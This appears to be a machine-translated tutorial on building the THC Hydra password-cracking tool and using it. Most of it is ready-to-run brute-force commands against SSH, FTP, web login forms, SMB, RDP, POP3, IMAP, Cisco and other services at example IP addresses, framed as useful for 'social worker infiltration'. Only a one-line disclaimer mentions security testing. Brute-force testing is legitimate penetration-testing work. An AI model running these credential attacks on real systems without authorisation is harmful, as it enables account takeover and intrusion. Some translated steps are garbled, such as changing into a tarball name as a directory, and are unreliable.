Hydra installation and use

explain ：
hydra It's a famous hacker organization thc An open source brute force password cracking tool , You can crack multiple passwords online . Official website ：http://www.thc.org/thc-hydra, Can support AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP And so on .
This brute force password cracking tool is quite powerful , Supports online password cracking for almost all protocols , Whether the password can be cracked depends on whether the dictionary is powerful enough . For social engineering penetration , Sometimes you can get twice the result with half the effort . This article only discusses testing from the perspective of security , Do not use for illegal events .

install ：
1.yum Install the corresponding dependent package

# yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel

2.hydra Compilation and installation

# cd /usr/local/src
# wget https://www.thc.org/releases/hydra-7.4.2.tar.gz
# tar zxf hydra-7.4.2.tar.gz
# cd hydra-7.4.2.tar.gz

# ./configure
# make
# make install

# ./configure It will detect some component configurations of the current system , Mainly for the detection of cracking support modules , You can install the corresponding support libraries and dependent packages as required


# make


# make install


Parameters ：

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R  Continue to crack from the last progress .
-S  use SSL link .
-s PORT  You can use this parameter to specify a non default port .
-l LOGIN  Specify users to crack , Crack for specific users .
-L FILE  Specify the user name dictionary .
-p PASS  A lowercase letter , Specify password cracking , To use less , It's usually a password dictionary .
-P FILE  Capitalization , Specify a password dictionary .
-e ns  Optional options ,n： Empty password test ,s： Use designated users and password Heuristics .
-C FILE  Use colon split format , for example “ Login name : password ” Instead of -L/-P Parameters .
-M FILE  Specify the target list file line by line .
-o FILE  Specify the result output file .
-f  In the use of -M After the parameters , Stop cracking when finding the first pair of login names or passwords .
-t TASKS  Number of threads running at the same time , The default is 16.
-w TIME  Set the maximum timeout time , Unit second , The default is 30s.
-v / -V  Show detailed process .
server  The goal is ip
service  Specify the service name , Supported services and protocols ：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{
   head|get} http-{
   get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp wait .
OPT  optional 

 
Use ：
1. Manually create user name dictionary and password dictionary , It's just for demonstration , Only a few usernames and weak passwords are added . When really cracking , You need to use the password dictionary generator to generate a powerful Dictionary


2. Crack ssh：
# hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.8 ssh

Crack success , Display results directly . You can also use -o Option to specify the result output file .
# hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh


Other examples ：

1. Crack ssh：
# hydra -l  user name  -p  Password dictionary  -t  Threads  -vV -e ns ip ssh
# hydra -l  user name  -p  Password dictionary  -t  Threads  -o save.log -vV ip ssh

 
2. Crack ftp：

# hydra ip ftp -l  user name  -P  Password dictionary  -t  Threads ( Default 16) -vV
# hydra ip ftp -l  user name  -P  Password dictionary  -e ns -vV

 
3.get Mode submission , Crack web Sign in ：

# hydra -l  user name  -p  Password dictionary  -t  Threads  -vV -e ns ip http-get /admin/
# hydra -l  user name  -p  Password dictionary  -t  Threads  -vV -e ns -f ip http-get /admin/index.php

 
4.post Mode submission , Crack web Sign in ：

# hydra -l  user name  -P  Password dictionary  -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
# hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:wrong username or password"
（ Parameter description ：-t Number of threads at the same time 3,-l User name is admin, Dictionaries pass.txt, Save as out.txt,-f  When a password is cracked, it stops , 10.36.16.18 The goal is ip,http-post-form Indicates that the crack is using http Of post The password of the form submitted is cracked ,<title> The content in is the return information prompt indicating the wrong guess solution .）

 
5. Crack https：

# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

 
6. Crack teamspeak：

# hydra -l  user name  -P  Password dictionary  -s  Port number  -vV ip teamspeak

 
7. Crack cisco：

# hydra -P pass.txt 10.36.16.18 cisco
# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

 
8. Crack smb：

# hydra -l administrator -P pass.txt 10.36.16.18 smb

 
9. Crack pop3：

# hydra -l muts -P pass.txt my.pop3.mail pop3

 
10. Crack rdp：

# hydra ip rdp -l administrator -P pass.txt -V

 
11. Crack http-proxy：

# hydra -l admin -P pass.txt http-proxy://10.36.16.18

 
12. Crack imap：

# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
# hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
 This tool is far more powerful than the above tests , Whether the password can be cracked depends on the powerful dictionary , For social worker infiltration , Sometimes you can get twice the result with half the effort 

 
appendix ：---------------------------------------- Installation error ---------------------------------
appendix 1:hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory
If it is ubuntu System words , direct apt-get install cmake libssl-dev That's all right. . But my system centOS, Can't find libssl-dev This thing . Because the hands # Automatic compilation libssh

# yum install cmake
# cd /usr/local/src
# wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
# tar zxf libssh-0.4.8.tar.gz
# cd libssh-0.4.8
# mkdir build
# cd build
# cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
# make
# make install
# /sbin/ldconfig  // To execute this sentence , Otherwise it will appear hydra: error while loading shared libraries: libssh.so.4: cannot open shared object file: No such file or directory

# tar zxf hydra-7.4.2.tar.gz
# cd hydra-7.4.2.tar.gz
# ./configure
# make
# make install